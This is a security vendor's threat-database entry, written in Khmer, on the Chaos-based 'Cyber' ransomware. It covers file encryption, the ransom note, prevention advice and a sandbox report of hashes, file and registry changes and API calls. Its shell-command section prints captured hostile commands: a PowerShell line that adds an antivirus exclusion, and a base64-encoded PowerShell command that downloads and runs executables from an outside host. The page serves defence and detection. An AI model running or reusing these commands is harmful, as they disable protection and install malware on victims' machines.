សម្រង់បញ្ចុះតម្លៃច្រើនអាជ្ញាប័ណ្ណ
មូលដ្ឋានទិន្នន័យគំរាមកំហែង Ransomware Cyber Ransomware

Cyber Ransomware

ដោយ Mezo ក្នុង Ransomware
បកប្រែទៅ៖

តារាងពិន្ទុគំរាមកំហែង

Popularity Rank: 10,078
កម្រិតគំរាមកំហែង៖ 100 % (ខ្ពស់)
កុំព្យូទ័រដែលមានមេរោគ៖ 3,489
ឃើញដំបូង៖ October 15, 2021
បានឃើញចុងក្រោយ៖ November 12, 2025
OS(es) រងផលប៉ះពាល់៖ Windows

កម្មវិធីព្យាបាទដែលមានឈ្មោះថា Cyber គឺជាមេរោគពីប្រភេទ ransomware ។ នៅពេលត្រូវបានប្រតិបត្តិលើប្រព័ន្ធដែលបំពាន វាចាប់ផ្តើមដំណើរការអ៊ិនគ្រីបភ្លាមៗសម្រាប់ឯកសារទាំងអស់នៅលើឧបករណ៍ ហើយបន្ថែមឈ្មោះឯកសារដើមរបស់ពួកគេជាមួយនឹងផ្នែកបន្ថែម '.Cyber' ។ ឧទាហរណ៍ ឯកសារដែលមានឈ្មោះដំបូង '1.doc' នឹងបង្ហាញជា '1.doc.Cyber' បន្ទាប់ពីត្រូវបានអ៊ិនគ្រីប។ ដូចគ្នានេះដែរ '2.pdf' នឹងក្លាយទៅជា '2.pdf.Cyber" ហើយដូច្នេះនៅលើ។ អ្នកស្រាវជ្រាវផ្នែកសន្តិសុខតាមអ៊ីនធឺណិតបានចង្អុលបង្ហាញថាការគំរាមកំហែង Cyber Ransomware គឺផ្អែកលើមេរោគ Chaos malware ។

បន្ថែមពីលើការអ៊ិនគ្រីបឯកសារ Cyber Ransomware ក៏ផ្លាស់ប្តូរផ្ទាំងរូបភាពផ្ទៃតុ និងបង្កើតចំណាំតម្លៃលោះដែលមានឈ្មោះថា 'read_it.txt' ។ កំណត់ត្រាតម្លៃលោះមានការណែនាំសម្រាប់ជនរងគ្រោះ ដោយឧក្រិដ្ឋជនតាមអ៊ីនធឺណិតដែលទទួលខុសត្រូវចំពោះការវាយប្រហារ ransomware ជាធម្មតាទាមទារការទូទាត់ជាថ្នូរនឹងការឌិគ្រីបសោដើម្បីដោះសោឯកសារដែលបានអ៊ិនគ្រីប។

Cyber Ransomware អាចបង្ហាញប្រភេទឯកសារជាច្រើនដែលមិនអាចចូលដំណើរការបានតាមរយៈការអ៊ិនគ្រីប

កំណត់សម្គាល់ ransomware បង្ហាញថា ឯកសារសំខាន់ៗរបស់ជនរងគ្រោះ ដូចជា មូលដ្ឋានទិន្នន័យ ឯកសារ និងរូបថត ត្រូវបានអ៊ិនគ្រីប ហើយអាចត្រូវបានឌិគ្រីបបានតែដោយការបង់ប្រាក់លោះជារូបិយប័ណ្ណ Bitcoin ប៉ុណ្ណោះ។ ជាធម្មតាចំនួនទឹកប្រាក់លោះត្រូវបានលើកឡើង ហើយជនរងគ្រោះត្រូវបានផ្តល់មធ្យោបាយដើម្បីសាកល្បងការឌិគ្រីបលើឯកសារមួយចំនួនមុនពេលពួកគេបង់ប្រាក់។

កំណត់ត្រាជាញឹកញាប់មានព័ត៌មានទំនាក់ទំនងសម្រាប់អ្នកវាយប្រហារ ឬអ្នកតំណាងរបស់ពួកគេ។ ទោះជាយ៉ាងណាក៏ដោយ ពេលខ្លះព័ត៌មានទំនាក់ទំនងអាចមិនត្រឹមត្រូវទេ ហើយជនរងគ្រោះអាចមានការពិបាកក្នុងការទំនាក់ទំនងជាមួយអ្នកវាយប្រហារ។ លើសពីនេះ ផ្ទាំងរូបភាពរបស់ ransomware អាចបង្ហាញសារដូចគ្នា និងចំនួនលោះ ប៉ុន្តែមានព័ត៌មានលម្អិតទំនាក់ទំនងផ្សេងគ្នា។

នៅក្នុងការវាយប្រហារ ransomware ភាគច្រើន ការឌិគ្រីបដោយគ្មានការចូលរួមរបស់អ្នកវាយប្រហារ ជាធម្មតាមិនអាចទៅរួចទេ។ សូម្បីតែនៅពេលដែលជនរងគ្រោះបង់ថ្លៃលោះក៏ដោយ ពួកគេអាចនឹងមិនទទួលបានសោរឌិគ្រីប ឬកម្មវិធីដែលចាំបាច់ដើម្បីសង្គ្រោះឯកសាររបស់ពួកគេឡើយ។ ជាលទ្ធផល អ្នកជំនាញណែនាំយ៉ាងម៉ឺងម៉ាត់ប្រឆាំងនឹងការបង់ថ្លៃលោះ បើទោះបីជាព័ត៌មានទំនាក់ទំនងមានភាពស្របច្បាប់ ហើយតម្លៃលោះហាក់ដូចជាមានតម្លៃសមរម្យក៏ដោយ។

វាចាំបាច់ណាស់ក្នុងការចងចាំថាការបង់ថ្លៃលោះគាំទ្រសកម្មភាពឧក្រិដ្ឋកម្ម ហើយមិនធានាការសង្គ្រោះទិន្នន័យដែលបានអ៊ិនគ្រីបនោះទេ។ ជនរងគ្រោះគួរតែស្វែងរកជម្រើសផ្សេងទៀត ដូចជាការស្ដារឯកសារពីការបម្រុងទុក ឬស្វែងរកជំនួយពីអ្នកជំនាញផ្នែកសន្តិសុខ។

ត្រូវប្រាកដថាការពារឧបករណ៍ និងទិន្នន័យរបស់អ្នកពីការគំរាមកំហែងដូចជា Cyber Ransomware

វិធានការល្អបំផុតដែលអ្នកប្រើប្រាស់អាចអនុវត្តដើម្បីការពារឧបករណ៍ និងទិន្នន័យរបស់ពួកគេពីការវាយប្រហារ ransomware ពាក់ព័ន្ធនឹងការរួមបញ្ចូលគ្នានៃយុទ្ធសាស្រ្តសកម្ម និងប្រតិកម្ម។

ជាដំបូង អ្នកប្រើប្រាស់គួរតែប្រុងប្រយ័ត្នក្នុងសកម្មភាពអនឡាញរបស់ពួកគេ ហើយចាត់វិធានការដើម្បីជៀសវាងការធ្លាក់ខ្លួនជាជនរងគ្រោះចំពោះមេរោគឆ្លងមេរោគ ransomware ទូទៅ ដូចជាអ៊ីមែលបន្លំ ឬការទាញយកដែលមានគំនិតអាក្រក់។ នេះរាប់បញ្ចូលទាំងការប្រើពាក្យសម្ងាត់ខ្លាំង និងពិសេស ការធ្វើបច្ចុប្បន្នភាពកម្មវិធី និងប្រព័ន្ធប្រតិបត្តិការជាទៀងទាត់ និងការប្រុងប្រយ័ត្នចំពោះអ៊ីមែល ឬតំណភ្ជាប់ដែលគួរឱ្យសង្ស័យ។

ទីពីរ អ្នកប្រើប្រាស់គួរតែអនុវត្តវិធានការសុវត្ថិភាព ដូចជាការប្រើកម្មវិធីប្រឆាំងមេរោគដែលមានកេរ្តិ៍ឈ្មោះ និងការបើកជញ្ជាំងភ្លើងដើម្បីទប់ស្កាត់ការចូលប្រើឧបករណ៍របស់ពួកគេដែលគ្មានការអនុញ្ញាត។ ពួកគេក៏គួរពិចារណាផងដែរអំពីការប្រើប្រាស់ឧបករណ៍ស្វែងរកចំណុចបញ្ចប់ និងការឆ្លើយតប (EDR) ដែលអាចជួយស្វែងរក និងឆ្លើយតបទៅនឹងការវាយប្រហារ ransomware ក្នុងពេលវេលាជាក់ស្តែង។

ទីបី អ្នកប្រើប្រាស់គួរតែធ្វើការបម្រុងទុកទិន្នន័យសំខាន់ៗរបស់ពួកគេជាទៀងទាត់ទៅកាន់ប្រភពខាងក្រៅ ដូចជាសេវាកម្មពពក ឬដ្រាយវ៍រឹងខាងក្រៅ។ នេះអាចជួយធានាថា ទោះបីជាឧបករណ៍របស់ពួកគេត្រូវបានឆ្លងមេរោគ ransomware ក៏ដោយ ក៏ពួកគេនៅតែអាចចូលប្រើទិន្នន័យរបស់ពួកគេដោយមិនបង់ប្រាក់លោះ។

ទីបួន នៅក្នុងព្រឹត្តិការណ៍នៃការវាយប្រហារ ransomware អ្នកប្រើប្រាស់គួរតែជៀសវាងការបង់ប្រាក់លោះព្រោះវាអាចមិនធានាការសង្គ្រោះទិន្នន័យរបស់ពួកគេដោយសុវត្ថិភាព ហើយក៏អាចលើកទឹកចិត្តដល់សកម្មភាពឧក្រិដ្ឋកម្មបន្ថែមទៀតផងដែរ។ ផ្ទុយទៅវិញ ពួកគេគួរតែស្វែងរកជំនួយប្រកបដោយវិជ្ជាជីវៈពីអ្នកជំនាញសន្តិសុខ ហើយពិចារណារាយការណ៍អំពីការវាយប្រហារនេះទៅឱ្យសមត្ថកិច្ចអនុវត្តច្បាប់។

ជាចុងក្រោយ អ្នកប្រើប្រាស់គួរតែរក្សាការជូនដំណឹងអំពីការគំរាមកំហែង ransomware ចុងក្រោយបង្អស់ និងការវិវឌ្ឍន៍នៃបច្ចេកទេសវាយប្រហារ ដើម្បីបន្តដឹង និងរៀបចំដើម្បីការពារខ្លួនពីការវាយប្រហារដែលអាចកើតមាន។

អត្ថបទពេញលេញនៃកំណត់ត្រាតម្លៃលោះដែលទម្លាក់ដោយ Cyber Ransomware គឺ៖

កុំបារម្ភ អ្នកអាចត្រឡប់ឯកសាររបស់អ្នកទាំងអស់!

ឯកសារទាំងអស់របស់អ្នកដូចជា ឯកសារ រូបថត មូលដ្ឋានទិន្នន័យ និងឯកសារសំខាន់ៗផ្សេងទៀតត្រូវបានអ៊ិនគ្រីប

តើយើងផ្តល់ការធានាអ្វីខ្លះដល់អ្នក?

អ្នកអាចផ្ញើឯកសារដែលបានអ៊ិនគ្រីបរបស់អ្នកចំនួន 3 ហើយយើងឌិគ្រីបវាដោយឥតគិតថ្លៃ។

អ្នកត្រូវតែអនុវត្តតាមជំហានទាំងនេះ ដើម្បីឌិគ្រីបឯកសាររបស់អ្នក៖

1) សរសេរនៅលើអ៊ីមែលរបស់យើង: test@test.com (ក្នុងករណីគ្មានចម្លើយក្នុងរយៈពេល 24 ម៉ោងសូមពិនិត្យមើលថតសារឥតបានការរបស់អ្នក

ឬសរសេរមកយើងតាមអ៊ីមែលនេះ៖ test2@test.com)

2) ទទួលបាន Bitcoin (អ្នកត្រូវចំណាយសម្រាប់ការឌិគ្រីបនៅក្នុង Bitcoins ។

បន្ទាប់​ពី​ការ​ទូទាត់​ប្រាក់ យើង​នឹង​ផ្ញើ​ឱ្យ​អ្នក​នូវ​ឧបករណ៍​ដែល​នឹង​ឌិគ្រីប​ឯកសារ​ទាំងអស់​របស់​អ្នក​។​)

Cyber Ransomware វីដេអូ

គន្លឹះ៖ បើក សំឡេងរបស់អ្នក ហើយ មើលវីដេអូក្នុងទម្រង់ពេញអេក្រង់

របាយការណ៍វិភាគ

ព័ត៌មាន​ទូទៅ

Family Name: Cyber Ransomware
Signature status: No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a
SHA1: ec759c5df1845d1109fe2518380233ae1854850f
ទំហំ​ឯកសារ: 1.84 MB, 1839616 bytes
MD5: 92a4a3aa4b40e95e8ca1d015c048246b
SHA1: 443a688cc83423c7511d56b626f85a392e798ac1
ទំហំ​ឯកសារ: 5.12 KB, 5120 bytes
MD5: 969c9e50187024581e8943a2d8ed9d2d
SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
ទំហំ​ឯកសារ: 4.61 KB, 4608 bytes
MD5: d1657a06fd2a757c43372f77ed433f30
SHA1: 48d0f17e206fdcff74121783989c90117ee411f4
SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
ទំហំ​ឯកសារ: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • HighEntropy
  • No Version Info
  • x86

Block Information

Total Blocks: 8
Potentially Malicious Blocks: 7
Whitelisted Blocks: 1
Unknown Blocks: 0

Visual Map

x x x x x x x 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • ClipBanker.VA
  • ClipBanker.VB

Files Modified

File Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe Generic Write,Read Attributes
c:\users\user\deployment_test.exe Generic Write,Read Attributes

Registry Modifications

Key::Value ទិន្នន័យ API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 넜泝Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ᭖洢Ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 洧Ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 Z1敖敢灸牶B 뻯.Vebexpvr RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot „ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype Generic RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 椓嵌Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ﻒ⍮味ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 㴠ȁ龡^8獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
Show More
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetNlsSectionPtr
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile

206 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
open C:\Users\Vebexpvr\deployment_test.EXE
cmd.exe /c father.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
Show More
